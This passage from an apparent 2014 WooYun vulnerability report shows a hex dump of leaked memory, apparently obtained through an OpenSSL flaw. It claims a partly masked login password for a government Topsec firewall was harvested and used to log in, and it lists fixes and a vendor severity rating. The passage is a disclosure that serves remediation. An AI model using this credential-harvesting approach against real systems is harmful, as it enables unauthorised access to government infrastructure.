0510: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0570: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0580: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0590: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
05f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0600: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0610: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0620: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0630: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0640: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0650: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0660: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0670: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0680: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0690: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
06f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0710: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0720: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0730: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
07f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0830: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0840: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
08f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
09f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0a90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0aa0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0b90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ba0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0bb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0bc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0bd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0be0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0bf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0c90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ca0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0cb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0cc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0cd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ce0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0cf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0d90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0da0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0db0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0dc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0dd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0de0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0df0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e50: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e60: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e70: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0e90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0eb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0ef0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
0f20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................


获取登陆密码:********@xxzx.gov.cn 部分密码用*替代。
登陆后界面:

天融信墙.JPG


只看了看信息。

修复方案:

1:修复openssl漏洞
2: 对防火墙管理地址做acl限制

版权声明:转载请注明来源 火焰真菌@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2014-11-14 17:48

厂商回复:

最新状态:

暂无